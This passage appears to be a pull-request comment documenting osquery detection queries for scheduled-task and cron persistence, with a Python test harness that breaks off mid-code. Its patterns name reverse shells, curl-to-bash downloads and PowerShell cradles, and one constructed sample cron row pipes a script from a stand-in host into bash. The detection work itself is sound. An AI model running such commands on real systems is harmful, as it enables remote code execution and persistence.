
@tomsonpl
Contributor

Scheduled Tasks Artifact (Cross-Platform Persistence Detection)

The Scheduled Tasks artifact provides comprehensive visibility into OS-level persistence mechanisms across all major operating systems. This wrapper encompasses three platform-specific queries that detect suspicious scheduled execution patterns using dual-detection logic: (1) non-whitelisted tasks/jobs not in known-good allowlists and (2) Living off the Land (LotL) attack indicators that identify abuse of legitimate system utilities. Together, these queries provide complete coverage for detecting persistence via scheduled execution—one of the most common techniques used by adversaries for maintaining long-term access to compromised systems.

Core Forensic Artifacts Coverage

| # | Artifact | OS | Query | File | Description |
|---|----------|----|-------|------|-------------|
| 1 | Scheduled Tasks | Windows | scheduled_tasks_windows_elastic | a1b2c3d4 | Windows scheduled tasks detection with whitelist and LotL patterns |
| 2 | Scheduled Tasks | Linux | crontab_linux_elastic | b2c3d4e5 | Linux cron jobs detection with whitelist and LotL patterns |
| 3 | Scheduled Tasks | macOS | launchd_macos_elastic | c3d4e5f6 | macOS launch agents/daemons detection with whitelist and LotL patterns |

Queries by Platform


🪟 Windows - Scheduled Task Persistence Detection

Description

Detects suspicious Windows scheduled tasks using a dual-detection approach: (1) Non-whitelisted tasks not in known-good allowlist and (2) Living off the Land (LotL) attack indicators. Identifies both unsigned/unknown tasks AND abuse of legitimate Windows tools (powershell -e, certutil, wscript, etc.) for persistence, privilege escalation, and lateral movement. Uses path-based whitelist filtering to auto-exclude legitimate Microsoft Windows tasks from System32/SysWOW64 and known-good third-party updaters, while flagging suspicious patterns regardless of code signature. This query provides a live snapshot of currently configured tasks (not historical event log data).

Detection Focus:

  • PowerShell base64 encoded commands and download cradles
  • Execution policy bypasses and hidden windows
  • CertUtil, BITSAdmin, and Windows Script Host abuse
  • Tasks running from writable locations (Users\Public, ProgramData, Temp)
  • Script file execution (HTA, VBS, JS) and proxy execution (regsvr32, rundll32)
  • Hidden and enabled scheduled tasks from non-Microsoft paths
  • Non-standard tasks not matching known-good allowlist patterns
  • MITRE ATT&CK: T1053.005 (Scheduled Task/Job), T1059.001 (PowerShell), T1105 (Ingress Tool Transfer)

Result

Screenshot 2025-11-21 at 17 31 14

Query results will show suspicious scheduled tasks with dual classification: LOTL_INDICATOR for tasks exhibiting Living off the Land techniques, NON_WHITELISTED for tasks not matching known-good patterns, or both. Results include task metadata (name, path, action, state, schedule), detection reasoning, code signature information, and file hashes for executable validation.

Platform

windows

Interval

3600 seconds (1 hour)

Query ID

scheduled_tasks_windows_elastic

ECS Field Mappings

  • process.name ← name
  • process.executable ← action
  • process.command_line ← action
  • file.path ← path
  • file.hash.sha256 ← sha256
  • file.hash.sha1 ← sha1
  • file.hash.md5 ← md5
  • file.size ← size
  • file.mtime ← mtime
  • file.ctime ← ctime
  • file.directory ← directory
  • rule.category ← type
  • event.outcome ← state
  • code_signature.subject_name ← subject_name
  • code_signature.status ← signature_result
  • event.category ← detection_method
  • rule.description ← detection_reason

SQL Query

-- Detects suspicious scheduled tasks via whitelist and LotL patterns
-- MITRE: T1053.005, T1059.001, T1105

WITH non_whitelisted AS (
    SELECT
        st.name,
        st.action,
        st.path,
        st.enabled,
        st.state,
        st.hidden,
        st.last_run_time,
        st.next_run_time,
        st.last_run_message,
        1 AS is_non_whitelisted,
        0 AS is_lotl
    FROM scheduled_tasks AS st
    WHERE st.name IS NOT NULL
        AND st.name != ''
        AND st.action IS NOT NULL
        AND st.action != ''
        -- Whitelist: Microsoft system tasks from System32/SysWOW64
        AND NOT (
            (st.path LIKE '\Microsoft\Windows\%' OR st.path LIKE '\Microsoft\Office\%' OR st.path LIKE '\Microsoft\XblGameSave\%')
            AND (
                LOWER(st.action) LIKE '%systemroot%\system32\%'
                OR LOWER(st.action) LIKE '%windir%\system32\%'
                OR LOWER(st.action) LIKE 'c:\windows\system32\%'
                OR LOWER(st.action) LIKE '%systemroot%\syswow64\%'
                OR LOWER(st.action) LIKE '%windir%\syswow64\%'
                OR LOWER(st.action) LIKE 'c:\windows\syswow64\%'
                OR LOWER(st.action) LIKE '%programfiles%\windows defender\%'
                OR LOWER(st.action) LIKE 'c:\program files\windows defender\%'
                OR LOWER(st.action) LIKE '%program files%\microsoft office\%'
                OR LOWER(st.action) LIKE 'c:\program files\microsoft office\%'
                OR LOWER(st.action) LIKE 'c:\program files (x86)\microsoft office\%'
            )
        )
        -- Whitelist: Defender tasks from legitimate ProgramData
        AND NOT (
            st.path LIKE '\Microsoft\Windows\Windows Defender\%'
            AND (
                LOWER(st.action) LIKE 'c:\programdata\microsoft\windows defender\%'
                OR LOWER(st.action) LIKE '%\programdata\microsoft\windows defender\%'
                OR LOWER(st.action) LIKE '%\program files\windows defender\%'
            )
        )
        -- Whitelist: Edge Update tasks
        AND NOT (
            st.path LIKE '\MicrosoftEdgeUpdate%'
            OR (st.path LIKE '%EdgeUpdate%' AND st.action LIKE '%Microsoft\EdgeUpdate\%')
        )
        -- Whitelist: Common Windows executables for Microsoft tasks
        AND NOT (
            st.path LIKE '\Microsoft\Windows\%'
            AND (
                LOWER(st.action) LIKE 'sc.exe %'
                OR LOWER(st.action) LIKE 'btudtask.exe%'
                OR LOWER(st.action) LIKE 'schtasks.exe%'
                OR LOWER(st.action) LIKE '%wmpnscfg.exe%'
            )
        )
        -- Whitelist: Windows subsystem tasks
        AND NOT (
            st.path LIKE '%\Bluetooth\%'
            OR st.path LIKE '%\UPnP\%'
            OR st.path LIKE '%\UsageAndQualityInsights\%'
            OR st.path LIKE '%\Diagnosis\%'
            OR st.path LIKE '%\UpdateOrchestrator\%'
            OR st.path LIKE '%\WindowsUpdate\%'
            OR st.path LIKE '%\Defrag\%'
            OR st.path LIKE '%\Application Experience\%'
            OR st.path LIKE '%\Location\%'
            OR st.path LIKE '%\Sysmain\%'
            OR st.path LIKE '%\ApplicationData\%'
            OR st.path LIKE '%\DUSM\%'
            OR st.path LIKE '%\capabilityaccessmanager\%'
            OR st.path LIKE '%\AppxDeploymentClient\%'
            OR st.path LIKE '%\Windows Media Sharing\%'
        )
        -- Whitelist: Known-good third-party updaters (Google, Adobe, OneDrive)
        AND NOT (
            st.path LIKE '%\Google\Update%'
            AND st.action LIKE '%Google\Update\%'
        )
        AND NOT (
            st.path LIKE '%\Adobe\%'
            AND st.action LIKE '%Adobe%'
        )
        AND NOT (
            st.path LIKE '%OneDrive%'
        )
),
lotl_indicators AS (
    SELECT
        st.name,
        st.action,
        st.path,
        st.enabled,
        st.state,
        st.hidden,
        st.last_run_time,
        st.next_run_time,
        st.last_run_message,
        0 AS is_non_whitelisted,
        1 AS is_lotl,
        CASE
            WHEN st.action LIKE '%powershell% -e%' OR st.action LIKE '% -enc %' OR st.action LIKE '% -EncodedCommand %' THEN 'PowerShell base64 encoded command'
            WHEN st.action LIKE '%Invoke-WebRequest%' OR st.action LIKE '%IWR %' OR st.action LIKE '%Invoke-RestMethod%' THEN 'PowerShell download cradle'
            WHEN st.action LIKE '%-ExecutionPolicy Bypass%' OR st.action LIKE '%-ep bypass%' THEN 'PowerShell execution policy bypass'
            WHEN st.action LIKE '%-w hidden%' OR st.action LIKE '%-windowstyle hidden%' THEN 'PowerShell hidden window'
            WHEN st.action LIKE '%IEX(%' OR st.action LIKE '%Invoke-Expression%' THEN 'PowerShell obfuscated command'
            WHEN st.action LIKE '%[Convert]::FromBase64String%' THEN 'PowerShell base64 decode obfuscation'
            WHEN st.action LIKE '%certutil% -urlcache%' OR st.action LIKE '%certutil% -f%' THEN 'CertUtil download abuse'
            WHEN st.action LIKE '%bitsadmin% /transfer%' THEN 'BITSAdmin download abuse'
            WHEN (st.action LIKE '%C:\Users\Public\%' OR st.action LIKE '%C:\ProgramData\%') AND st.action NOT LIKE '%\ProgramData\Microsoft\Windows Defender\%' THEN 'Suspicious file path (writable by low-priv users)'
            WHEN st.action LIKE '%\Temp\%' OR st.action LIKE '%\AppData\Local\Temp\%' THEN 'Execution from Temp directory'
            WHEN st.action LIKE '%wscript.exe%' OR st.action LIKE '%cscript.exe%' THEN 'Windows Script Host abuse'
            WHEN st.action LIKE '%mshta.exe%' THEN 'MSHTA.exe abuse'
            WHEN st.action LIKE '%.hta%' OR st.action LIKE '%.vbs%' OR st.action LIKE '%.js%' THEN 'Script file execution'
            WHEN (st.action LIKE '%regsvr32%' OR st.action LIKE '%rundll32%') AND st.path NOT LIKE '\Microsoft\Windows\%' THEN 'Proxy execution via regsvr32/rundll32'
            WHEN st.action LIKE '%msiexec%' THEN 'MSI package execution'
            WHEN st.hidden = 1 AND st.enabled = 1
                AND st.path NOT LIKE '\Microsoft\Windows\%'
                AND st.path NOT LIKE '\Microsoft\Office\%'
                AND st.path NOT LIKE '\Microsoft\XblGameSave\%'
                AND st.path NOT LIKE '\Microsoft\EdgeUpdate\%'
                AND st.path NOT LIKE '\MicrosoftEdgeUpdate%'
                AND st.path NOT LIKE '%OneDrive%'
            THEN 'Hidden and enabled scheduled task'
            ELSE 'Unknown LotL pattern'
        END AS lotl_reason
    FROM scheduled_tasks AS st
    WHERE st.name IS NOT NULL
        AND st.name != ''
        AND st.action IS NOT NULL
        AND st.action != ''
        AND (
            st.action LIKE '%powershell% -e%'
            OR st.action LIKE '% -enc %'
            OR st.action LIKE '% -EncodedCommand %'
            OR st.action LIKE '%Invoke-WebRequest%'
            OR st.action LIKE '%IWR %'
            OR st.action LIKE '%Invoke-RestMethod%'
            OR st.action LIKE '%-ExecutionPolicy Bypass%'
            OR st.action LIKE '%-ep bypass%'
            OR st.action LIKE '%-w hidden%'
            OR st.action LIKE '%-windowstyle hidden%'
            OR st.action LIKE '%IEX(%'
            OR st.action LIKE '%Invoke-Expression%'
            OR st.action LIKE '%[Convert]::FromBase64String%'
            OR st.action LIKE '%certutil% -urlcache%'
            OR st.action LIKE '%certutil% -f%'
            OR st.action LIKE '%bitsadmin% /transfer%'
            OR (st.action LIKE '%C:\Users\Public\%' AND st.action NOT LIKE '%\ProgramData\Microsoft\Windows Defender\%')
            OR (st.action LIKE '%C:\ProgramData\%' AND st.action NOT LIKE '%\ProgramData\Microsoft\Windows Defender\%')
            OR st.action LIKE '%\Temp\%'
            OR st.action LIKE '%\AppData\Local\Temp\%'
            OR st.action LIKE '%wscript.exe%'
            OR st.action LIKE '%cscript.exe%'
            OR st.action LIKE '%mshta.exe%'
            OR st.action LIKE '%.hta%'
            OR st.action LIKE '%.vbs%'
            OR st.action LIKE '%.js%'
            OR (st.action LIKE '%regsvr32%' AND st.path NOT LIKE '\Microsoft\Windows\%')
            OR (st.action LIKE '%rundll32%' AND st.path NOT LIKE '\Microsoft\Windows\%')
            OR st.action LIKE '%msiexec%'
            OR (
                st.hidden = 1 AND st.enabled = 1
                AND st.path NOT LIKE '\Microsoft\Windows\%'
                AND st.path NOT LIKE '\Microsoft\Office\%'
                AND st.path NOT LIKE '\Microsoft\XblGameSave\%'
                AND st.path NOT LIKE '\Microsoft\EdgeUpdate\%'
                AND st.path NOT LIKE '\MicrosoftEdgeUpdate%'
                AND st.path NOT LIKE '%OneDrive%'
            )
        )
),
combined AS (
    SELECT
        st.name,
        st.action,
        st.path,
        st.enabled,
        st.state,
        st.hidden,
        st.last_run_time,
        st.next_run_time,
        st.last_run_message,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'Scheduled Task (LotL)'
            ELSE 'Scheduled Task'
        END AS type,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN 'LOTL_INDICATOR + NON_WHITELISTED'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'LOTL_INDICATOR'
            ELSE 'NON_WHITELISTED'
        END AS detection_method,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN MAX(li.lotl_reason) || ' + Not in known-good allowlist'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN MAX(li.lotl_reason)
            ELSE 'Scheduled task not in known-good allowlist'
        END AS detection_reason
    FROM scheduled_tasks AS st
    LEFT JOIN non_whitelisted AS nw ON st.name = nw.name AND st.path = nw.path AND st.action = nw.action
    LEFT JOIN lotl_indicators AS li ON st.name = li.name AND st.path = li.path AND st.action = li.action
    WHERE COALESCE(nw.is_non_whitelisted, 0) = 1 OR COALESCE(li.is_lotl, 0) = 1
    GROUP BY st.name, st.path, st.action, st.enabled, st.state, st.hidden, st.last_run_time, st.next_run_time, st.last_run_message
)
SELECT
    c.name,
    c.action,
    c.path,
    c.type,
    c.enabled,
    c.state,
    c.hidden,
    c.last_run_time,
    c.next_run_time,
    c.last_run_message,
    c.detection_method,
    c.detection_reason,
    a.subject_name,
    a.result AS signature_result,
    h.sha256,
    h.sha1,
    h.md5,
    f.size,
    f.mtime,
    f.ctime,
    f.directory
FROM combined AS c
LEFT JOIN authenticode AS a ON c.action = a.path
LEFT JOIN hash AS h ON c.action = h.path
LEFT JOIN file AS f ON c.action = f.path
ORDER BY
    CASE WHEN c.detection_method LIKE 'LOTL_INDICATOR%' THEN 0 ELSE 1 END,
    c.detection_reason,
    c.hidden DESC,
    c.name

🐧 Linux - Cron Job Persistence Detection

Description

Detects suspicious Linux cron jobs using a dual-detection approach: (1) Non-whitelisted cron jobs not in known-good allowlist and (2) Living off the Land (LotL) attack indicators. Identifies both non-standard cron jobs AND abuse of legitimate Unix tools (curl|bash, nc -e, base64 -d, etc.) for persistence, privilege escalation, and lateral movement. Uses path-based and command-based whitelist filtering to auto-exclude legitimate system cron jobs (cron.d, cron.daily, package managers, system maintenance tasks) while flagging suspicious patterns regardless of location. Supports multiple distributions (Ubuntu, Debian, CentOS, RHEL, Fedora, openSUSE). This query provides a live snapshot of currently configured cron jobs (not historical event log data).

Detection Focus:

  • Download and pipe to shell patterns (curl|bash, wget|sh)
  • Reverse shells via netcat, bash network redirection, socat
  • Base64 decode for obfuscation and encoded command execution
  • Shell command execution via -c flag and interactive shell invocation
  • One-liner execution (Python, Perl, Ruby, PHP)
  • Execution from temporary/writable directories (/tmp, /dev/shm, /var/tmp)
  • Sudo without password prompt and setuid bit modifications
  • SSH authorized_keys manipulation and crontab modification persistence
  • Non-standard cron jobs not matching known-good system maintenance patterns
  • MITRE ATT&CK: T1053.003 (Cron), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)

Result

Screenshot 2025-11-21 at 17 31 33

Query results will show suspicious cron jobs with dual classification: LOTL_INDICATOR for jobs exhibiting Living off the Land techniques, NON_WHITELISTED for jobs not matching known-good patterns, or both. Results include cron metadata (command, path, schedule, owner), detection reasoning, and file hashes for executable validation.

Platform

linux

Interval

3600 seconds (1 hour)

Query ID

crontab_linux_elastic

ECS Field Mappings

  • event.category ← detection_method
  • rule.description ← detection_reason
  • rule.category ← type
  • process.command_line ← command
  • process.executable ← executable_path
  • file.path ← executable_path
  • file.hash.sha256 ← sha256
  • file.hash.sha1 ← sha1
  • file.hash.md5 ← md5
  • file.size ← size
  • file.mtime ← mtime
  • file.ctime ← ctime
  • file.directory ← directory
  • file.uid ← uid
  • file.gid ← gid
  • file.mode ← mode
  • user.name ← crontab_owner

SQL Query

-- Detects suspicious cron jobs via whitelist and LotL patterns
-- MITRE: T1053.003, T1059.004, T1105
-- Multi-distro support: Ubuntu, Debian, CentOS, RHEL, Fedora, openSUSE, Arch

WITH non_whitelisted AS (
    SELECT
        c.command,
        c.path AS crontab_path,
        c.event,
        c.minute,
        c.hour,
        c.day_of_month,
        c.month,
        c.day_of_week,
        CASE
            WHEN c.command LIKE '/%' THEN
                CASE
                    WHEN INSTR(c.command, ' ') > 0 THEN SUBSTR(c.command, 1, INSTR(c.command, ' ') - 1)
                    ELSE c.command
                END
            ELSE NULL
        END AS executable_path,
        CASE
            WHEN c.path LIKE '/var/spool/cron/crontabs/%' THEN REPLACE(c.path, '/var/spool/cron/crontabs/', '')
            WHEN c.path LIKE '/var/spool/cron/%' THEN REPLACE(c.path, '/var/spool/cron/', '')
            ELSE 'system'
        END AS crontab_owner,
        1 AS is_non_whitelisted,
        0 AS is_lotl
    FROM crontab AS c
    WHERE c.command IS NOT NULL
        AND c.command != ''
        -- Whitelist: System cron with standard executable paths
        AND NOT (
            (c.path LIKE '/etc/cron.d/%'
                OR c.path LIKE '/etc/cron.daily/%'
                OR c.path LIKE '/etc/cron.hourly/%'
                OR c.path LIKE '/etc/cron.weekly/%'
                OR c.path LIKE '/etc/cron.monthly/%'
                OR c.path = '/etc/crontab'
            )
            AND (
                c.command LIKE '/usr/bin/%'
                OR c.command LIKE '/usr/sbin/%'
                OR c.command LIKE '/bin/%'
                OR c.command LIKE '/sbin/%'
                OR c.command LIKE '/usr/local/bin/%'
                OR c.command LIKE '/usr/local/sbin/%'
            )
        )
        -- Whitelist: Package managers and system maintenance
        AND NOT (
            c.command LIKE '%apt %'
            OR c.command LIKE '%apt-get %'
            OR c.command LIKE '%dpkg %'
            OR c.command LIKE '%yum %'
            OR c.command LIKE '%dnf %'
            OR c.command LIKE '%zypper %'
            OR c.command LIKE '%pacman %'
            OR c.command LIKE '%anacron %'
            OR c.command LIKE '%logrotate %'
            OR c.command LIKE '%mandb %'
            OR c.command LIKE '%man-db %'
            OR c.command LIKE '%updatedb %'
            OR c.command LIKE '%mlocate %'
            OR c.command LIKE '%run-parts %'
            OR (c.command LIKE '%/etc/cron.%' AND c.path LIKE '/etc/crontab')
        )
        -- Whitelist: Ubuntu/Debian system packages (sysstat, e2fsprogs, etc.)
        AND NOT (
            c.path LIKE '/etc/cron.d/%'
            AND (
                c.command LIKE '%debian-sa1%'
                OR c.command LIKE '%/usr/lib/sysstat/%'
                OR c.command LIKE '%e2scrub%'
                OR c.command LIKE '%/usr/lib/%/e2fsprogs/%'
                OR c.command LIKE '%apt-compat%'
                OR c.command LIKE '%dpkg%'
                OR c.command LIKE '%update-notifier%'
                OR c.command LIKE '%popularity-contest%'
            )
        )
        -- Whitelist: System binaries from /etc/cron.d/ (excludes /tmp, /var/tmp, /dev/shm)
        AND NOT (
            c.path LIKE '/etc/cron.d/%'
            AND (
                c.command LIKE '%/sbin/%'
                OR c.command LIKE '%/usr/sbin/%'
                OR c.command LIKE '%/bin/%'
                OR c.command LIKE '%/usr/bin/%'
                OR c.command LIKE '%/usr/lib/%'
            )
            AND c.command NOT LIKE '%/tmp/%'
            AND c.command NOT LIKE '%/var/tmp/%'
            AND c.command NOT LIKE '%/dev/shm/%'
        )
        -- Whitelist: Root crontabs with standard paths (excludes curl, wget, nc)
        AND NOT (
            c.path = '/var/spool/cron/crontabs/root'
            AND (
                c.command LIKE '/usr/bin/%'
                OR c.command LIKE '/usr/sbin/%'
                OR c.command LIKE '/bin/%'
                OR c.command LIKE '/sbin/%'
            )
            AND c.command NOT LIKE '%curl%'
            AND c.command NOT LIKE '%wget%'
            AND c.command NOT LIKE '%nc %'
            AND c.command NOT LIKE '%netcat%'
        )
),
lotl_indicators AS (
    SELECT
        c.command,
        c.path AS crontab_path,
        c.event,
        c.minute,
        c.hour,
        c.day_of_month,
        c.month,
        c.day_of_week,
        CASE
            WHEN c.command LIKE '/%' THEN
                CASE
                    WHEN INSTR(c.command, ' ') > 0 THEN SUBSTR(c.command, 1, INSTR(c.command, ' ') - 1)
                    ELSE c.command
                END
            ELSE NULL
        END AS executable_path,
        CASE
            WHEN c.path LIKE '/var/spool/cron/crontabs/%' THEN REPLACE(c.path, '/var/spool/cron/crontabs/', '')
            WHEN c.path LIKE '/var/spool/cron/%' THEN REPLACE(c.path, '/var/spool/cron/', '')
            ELSE 'system'
        END AS crontab_owner,
        0 AS is_non_whitelisted,
        1 AS is_lotl,
        CASE
            WHEN c.command LIKE '%curl%|%bash%' OR c.command LIKE '%curl%|%sh%' THEN 'Download and pipe to shell (curl|bash)'
            WHEN c.command LIKE '%wget%|%bash%' OR c.command LIKE '%wget%|%sh%' THEN 'Download and pipe to shell (wget|sh)'
            WHEN c.command LIKE '%curl %http%' OR c.command LIKE '%wget %http%' THEN 'Download utility with remote URL'
            WHEN c.command LIKE '%nc -e%' OR c.command LIKE '%ncat -e%' THEN 'Reverse shell via netcat'
            WHEN c.command LIKE '%/dev/tcp/%' OR c.command LIKE '%/dev/udp/%' THEN 'Bash network redirection (reverse shell)'
            WHEN c.command LIKE '%socat%TCP%' OR c.command LIKE '%socat%EXEC%' THEN 'Socat reverse shell'
            WHEN c.command LIKE '%base64 -d%' OR c.command LIKE '%base64 --decode%' OR c.command LIKE '%base64 -D%' THEN 'Base64 decode for obfuscation'
            WHEN c.command LIKE '%echo%|%base64%' THEN 'Base64 encoded command execution'
            WHEN c.command LIKE '%bash -c%' OR c.command LIKE '%sh -c%' THEN 'Shell command execution via -c flag'
            WHEN c.command LIKE '%bash -i%' OR c.command LIKE '%sh -i%' THEN 'Interactive shell invocation'
            WHEN c.command LIKE '%python -c%' OR c.command LIKE '%python3 -c%' THEN 'Python one-liner execution'
            WHEN c.command LIKE '%perl -e%' THEN 'Perl one-liner execution'
            WHEN c.command LIKE '%ruby -e%' THEN 'Ruby one-liner execution'
            WHEN c.command LIKE '%php -r%' THEN 'PHP one-liner execution'
            -- /var/tmp/ is checked before /tmp/, which it also contains; otherwise this branch is unreachable
            WHEN c.command LIKE '%/var/tmp/%' THEN 'Execution from /var/tmp directory'
            WHEN c.command LIKE '%/tmp/%' THEN 'Execution from /tmp directory'
            WHEN c.command LIKE '%/dev/shm/%' THEN 'Execution from /dev/shm (world-writable memory filesystem)'
            WHEN c.command LIKE '%./%' OR c.command LIKE '%/.%' THEN 'Execution from hidden directory'
            WHEN c.command LIKE '%sudo -n%' OR c.command LIKE '%sudo --non-interactive%' THEN 'Sudo without password prompt'
            WHEN c.command LIKE '%chmod +s%' OR c.command LIKE '%chmod 4755%' OR c.command LIKE '%chmod 4777%' THEN 'Setuid bit modification (privilege escalation)'
            WHEN c.command LIKE '%authorized_keys%' AND (c.command LIKE '%echo%' OR c.command LIKE '%cat%' OR c.command LIKE '%>>%') THEN 'SSH authorized_keys manipulation'
            WHEN c.command LIKE '%crontab -e%' OR c.command LIKE '%crontab -%' THEN 'Crontab modification (persistence)'
            WHEN c.command LIKE '%nohup%&%' OR c.command LIKE '%disown%' THEN 'Background process persistence'
            WHEN c.command LIKE '%nc %' OR c.command LIKE '%netcat%' THEN 'Netcat network utility abuse'
            WHEN c.command LIKE '%eval%' OR c.command LIKE '%exec%' THEN 'Eval/exec command execution'
            ELSE 'Unknown LotL pattern'
        END AS lotl_reason
    FROM crontab AS c
    WHERE c.command IS NOT NULL
        AND c.command != ''
        AND (
            c.command LIKE '%curl%|%bash%'
            OR c.command LIKE '%curl%|%sh%'
            OR c.command LIKE '%wget%|%bash%'
            OR c.command LIKE '%wget%|%sh%'
            OR c.command LIKE '%curl %http%'
            OR c.command LIKE '%wget %http%'
            OR c.command LIKE '%nc -e%'
            OR c.command LIKE '%ncat -e%'
            OR c.command LIKE '%/dev/tcp/%'
            OR c.command LIKE '%/dev/udp/%'
            OR c.command LIKE '%socat%TCP%'
            OR c.command LIKE '%socat%EXEC%'
            OR c.command LIKE '%base64 -d%'
            OR c.command LIKE '%base64 --decode%'
            OR c.command LIKE '%base64 -D%'
            OR c.command LIKE '%echo%|%base64%'
            OR c.command LIKE '%bash -c%'
            OR c.command LIKE '%sh -c%'
            OR c.command LIKE '%bash -i%'
            OR c.command LIKE '%sh -i%'
            OR c.command LIKE '%python -c%'
            OR c.command LIKE '%python3 -c%'
            OR c.command LIKE '%perl -e%'
            OR c.command LIKE '%ruby -e%'
            OR c.command LIKE '%php -r%'
            OR c.command LIKE '%/tmp/%'
            OR c.command LIKE '%/dev/shm/%'
            OR c.command LIKE '%/var/tmp/%'
            OR c.command LIKE '%./%'
            OR c.command LIKE '%/.%'
            OR c.command LIKE '%sudo -n%'
            OR c.command LIKE '%sudo --non-interactive%'
            OR c.command LIKE '%chmod +s%'
            OR c.command LIKE '%chmod 4755%'
            OR c.command LIKE '%chmod 4777%'
            OR (c.command LIKE '%authorized_keys%' AND (c.command LIKE '%echo%' OR c.command LIKE '%cat%' OR c.command LIKE '%>>%'))
            OR c.command LIKE '%crontab -e%'
            OR c.command LIKE '%crontab -%'
            OR c.command LIKE '%nohup%&%'
            OR c.command LIKE '%disown%'
            OR c.command LIKE '%nc %'
            OR c.command LIKE '%netcat%'
            OR c.command LIKE '%eval%'
            OR c.command LIKE '%exec%'
        )
),
combined AS (
    SELECT
        c.command,
        c.path AS crontab_path,
        c.event,
        c.minute,
        c.hour,
        c.day_of_month,
        c.month,
        c.day_of_week,
        COALESCE(
            MAX(li.executable_path),
            MAX(nw.executable_path)
        ) AS executable_path,
        COALESCE(
            MAX(li.crontab_owner),
            MAX(nw.crontab_owner)
        ) AS crontab_owner,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'Cron Job (LotL)'
            ELSE 'Cron Job'
        END AS type,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN 'LOTL_INDICATOR + NON_WHITELISTED'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'LOTL_INDICATOR'
            ELSE 'NON_WHITELISTED'
        END AS detection_method,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN MAX(li.lotl_reason) || ' + Not in known-good allowlist'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN MAX(li.lotl_reason)
            ELSE 'Cron job not in known-good allowlist'
        END AS detection_reason
    FROM crontab AS c
    LEFT JOIN non_whitelisted AS nw ON c.command = nw.command AND c.path = nw.crontab_path
    LEFT JOIN lotl_indicators AS li ON c.command = li.command AND c.path = li.crontab_path
    WHERE COALESCE(nw.is_non_whitelisted, 0) = 1 OR COALESCE(li.is_lotl, 0) = 1
    GROUP BY c.command, c.path, c.event, c.minute, c.hour, c.day_of_month, c.month, c.day_of_week
)
SELECT
    c.command,
    c.crontab_path,
    c.event,
    c.minute,
    c.hour,
    c.day_of_month,
    c.month,
    c.day_of_week,
    c.executable_path,
    c.crontab_owner,
    c.type,
    c.detection_method,
    c.detection_reason,
    h.sha256,
    h.sha1,
    h.md5,
    f.size,
    f.mtime,
    f.ctime,
    f.directory,
    f.uid,
    f.gid,
    f.mode
FROM combined AS c
LEFT JOIN hash AS h ON c.executable_path = h.path
LEFT JOIN file AS f ON c.executable_path = f.path
ORDER BY
    CASE WHEN c.detection_method LIKE 'LOTL_INDICATOR%' THEN 0 ELSE 1 END,
    c.detection_reason,
    c.crontab_owner,
    c.command
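
Added example (not part of the PR or of Elastic's query packs): the Python harness below loads constructed cron rows into an in-memory SQLite `crontab` table, the dialect osquery runs, and applies a deliberately reduced version of the allowlist / LotL / combine structure used by the Windows and Linux queries above. It shows the two properties a detection engineer tunes against before deploying at a one-hour interval: the allowlist never suppresses a LotL hit (a distro-shipped `find -exec` job is still reported because `%exec%` is a bare substring match), and the first matching CASE branch decides the reported reason. Host name, paths and schedules in the sample rows are constructed.

```python
import sqlite3

# Constructed rows in the column order of osquery's crontab table:
# (event, minute, hour, day_of_month, month, day_of_week, command, path)
SAMPLE_CRONTAB = [
    # 1. Distro-shipped job: system cron dir + standard binary -> allowlisted, no LotL
    ("", "25", "6", "*", "*", "*",
     "/usr/sbin/logrotate /etc/logrotate.conf", "/etc/cron.daily/logrotate"),
    # 2. Download-and-pipe-to-shell in a service account's crontab (constructed host)
    ("", "*/10", "*", "*", "*", "*",
     "curl -s http://updates.example.invalid/agent.sh | bash",
     "/var/spool/cron/crontabs/www-data"),
    # 3. File staged in /tmp, started at boot from root's crontab
    ("@reboot", "", "", "", "", "",
     "/tmp/.cache/update", "/var/spool/cron/crontabs/root"),
    # 4. Benign log cleanup: allowlisted by path + binary, but '-exec' satisfies '%exec%'
    ("", "0", "4", "*", "*", "*",
     "/usr/bin/find /var/log -name '*.gz' -exec rm {} ;", "/etc/cron.d/logclean"),
    # 5. Operator-installed script outside the standard bin dirs, no LotL pattern
    ("", "30", "1", "*", "*", "*",
     "/opt/backup/run.sh --full", "/etc/cron.d/backup"),
]

# Reduced version of the PR query's three-CTE structure (allowlist, LotL
# classifier, LEFT JOIN combine). Only a handful of the PR's patterns are
# kept; GROUP BY is omitted because the sample rows are unique.
DETECTION_SQL = """
WITH non_whitelisted AS (
    SELECT command, path, 1 AS is_non_whitelisted
    FROM crontab
    WHERE command != ''
      AND NOT (
          (path LIKE '/etc/cron.d/%' OR path LIKE '/etc/cron.daily/%' OR path = '/etc/crontab')
          AND (command LIKE '/usr/bin/%' OR command LIKE '/usr/sbin/%' OR command LIKE '/bin/%')
      )
),
lotl_indicators AS (
    SELECT command, path, 1 AS is_lotl,
        CASE  -- first matching branch wins, so branch order decides the reason
            WHEN command LIKE '%curl%|%bash%' OR command LIKE '%curl%|%sh%'
                THEN 'Download and pipe to shell (curl|bash)'
            WHEN command LIKE '%/tmp/%' THEN 'Execution from /tmp directory'
            WHEN command LIKE '%eval%' OR command LIKE '%exec%' THEN 'Eval/exec command execution'
            ELSE 'Unknown LotL pattern'
        END AS lotl_reason
    FROM crontab
    WHERE command LIKE '%curl%|%bash%' OR command LIKE '%curl%|%sh%'
       OR command LIKE '%/tmp/%'
       OR command LIKE '%eval%' OR command LIKE '%exec%'
)
SELECT c.command, c.path,
    CASE
        WHEN li.is_lotl = 1 AND nw.is_non_whitelisted = 1 THEN 'LOTL_INDICATOR + NON_WHITELISTED'
        WHEN li.is_lotl = 1 THEN 'LOTL_INDICATOR'
        ELSE 'NON_WHITELISTED'
    END AS detection_method,
    CASE
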